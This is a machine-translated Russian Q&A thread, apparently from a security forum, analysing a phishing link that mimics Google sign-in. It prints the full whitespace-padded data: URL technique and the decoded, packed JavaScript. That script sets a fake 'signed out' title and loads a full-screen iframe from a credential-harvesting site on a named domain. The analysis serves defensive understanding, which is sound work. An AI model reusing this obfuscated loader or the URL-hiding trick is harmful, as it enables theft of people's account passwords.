я получил письмо от коллеги с вложенным файлом, который оказался на Google Drive, когда щелкнул это привело к следующему URL-адресу, который воссоздает учетную запись для входа в странице Google, чтобы украсть пароли:Это взлом аккаунта Google?
Из сценария есть способ идентифицировать, куда отправляется информация, если бы я ввел свой адрес электронной почты и пароль?
Если вы хотите проверить, сколько URL-адресов работает после нажатия на эту ссылку.
Установить Сведения о храме Надстройка в вашем браузере. откройте его и нажмите на эту ссылку. вы увидите много ссылок.
Лучший способ понять это, когда он предлагает ввести ваши учетные данные, проверьте, в каком домене вы находитесь. Если это домен Google, тогда это нормально, если нет, то его что-то связано с фишингом.
Здесь вы должны быть очень осторожны при проверке домена, злоумышленники играют в трюк, если домен является google, они создают очень похожее на что-то вроде gooogle или geogle. Поэтому внимательно проверьте домен.
Давайте разберем атаку, насколько мы можем:
это URL, начиная от с основной ссылки Gmail для входа, который устанавливает несколько переменных запроса для автоматического входа в систему, если это возможно.
data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue
Это сопровождается большим количеством пустых пространств, предназначенных для скрытия вредоносного из поля зрения в адресной строке браузера.
%20%20%20%20%20%20%20%20%20%20%20% (и т.д.)
теперь следует полезной нагрузки для жертвы. он закодирован base64.
, когда мы его расшифровать, это выглядит следующим образом:
eval(function (p, a, c, k, e, d)
{
e = function (c)
{
return c
};
if (!''.replace(/^/, String))
{
while (c--)
{
d[c] = k[c] || c
}
k = [function (e)
{
return d[e]
}
];
e = function()
{
return '\\w+'
};
c = 1
};
while (c--)
{
if (k[c])
{
p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
}
}
return p
}
('3.2.16="15 14 13 17 18";21{(20(){19 1=3.2.12(\'1\');1.10=\'7/8-6\';1.11=\'9 6\';1.22=\'\';2.31(\'34\')[0].23(1)}())}33(35){}3.2.36.37="<4 39=\\"38://32.26/25-24/\\" 27=\\"28: 0;30: 5%;29:5%\\"></4>";', 10, 40, '|link|document|window|iframe|100|icon|image|x|shortcut|type|rel|createElement|been|have|You|title|Signed|out|var|function|try|href|appendChild|content|wp|club|style|border|height|width|getElementsByTagName|bluevoicepgh|catch|head|e|body|outerHTML|http|src'.split('|'), 0, {}
))
это, является зло, затемненный JavaScript. не выполняйте его.
Ответ martinstoeckli содержит расширенную версию этого скрипта.
он устанавливает заголовок вашей текущей вкладки, чтобы отобразить страницу «вы были выписаны» из gMail и изменяет страницу, добавив заполняющий экран iframe без границ.
iFrame указывает на (что-то похожее) на взломанный сайт Wordpress, содержащий поддельную страницу входа в Gmail. При вводе учетных данных на поддельную страницу, размещенную на bluevoicepgh.club (кто-то может захотеть уведомить этих людей о том, что их веб-сайт на WordPress, вероятно, скомпрометирован), вы затем перенаправляетесь на страницу gmail, которая молчала вас в фоновом режиме. это происходит независимо от того, были ли правильные учетные данные, введенные вами на фальшивую страницу входа в систему, или нет.
Если вы действительно ввели действительные учетные данные на эту страницу, не сообщается, куда бы оно пошло, если только вы не сможете посмотреть на сценарий, стоящий за ним.
Имейте в виду, что (к счастью) в его нынешней форме атака не будет работать должным образом, поскольку на странице входа в Google используется https (и применяется использование https). Как хром напоминает нам, когда исполняется скрипт:
Mixed Content: The page at 'https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false…9keXxvdXRlckhUTUx8aHR0cHxzcmMnLnNwbGl0KCd8JyksMCx7fSkpCg==%3E%3C/script%3E' was loaded over HTTPS, but requested an insecure resource 'http://bluevoicepgh.club/wp-content/'. This request has been blocked; the content must be served over HTTPS.
Для тех, кто задается вопросом после того, как они вставили его в браузере. Теперь его _safe_ :). Домен ** закрыт **, и он не будет работать. – Reyo
Сценарий не может работать, потому что Google посылает x-frame-options = deny (это на браузер, чтобы уважать этот заголовок), но намерение ссылки кажется как это:
%20 являются заготовками, таким образом, один надеется скрыть содержимое URL, потому что следующий контент может быть вне видимой области.Возможно, кто-то хочет проанализировать фрейм, но это должно быть сделано с осторожностью, злонамеренный домен - bluevoicepgh.
window.document.title = "You have been Signed out";
try {
(function() {
var link = window.document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = '';
document.getElementsByTagName('head')[0].appendChild(link)
}())
} catch (e) {}
window.document.body.outerHTML = "<iframe src=\"http://!!maliciousdomain!!.club/wp-content/\" style=\"border: 0;width: 100%;height:100%\"></iframe>";
Просто для полноты декодированного скрипт часть: http://pastebin.com/0ZK3s2L1 – Andreas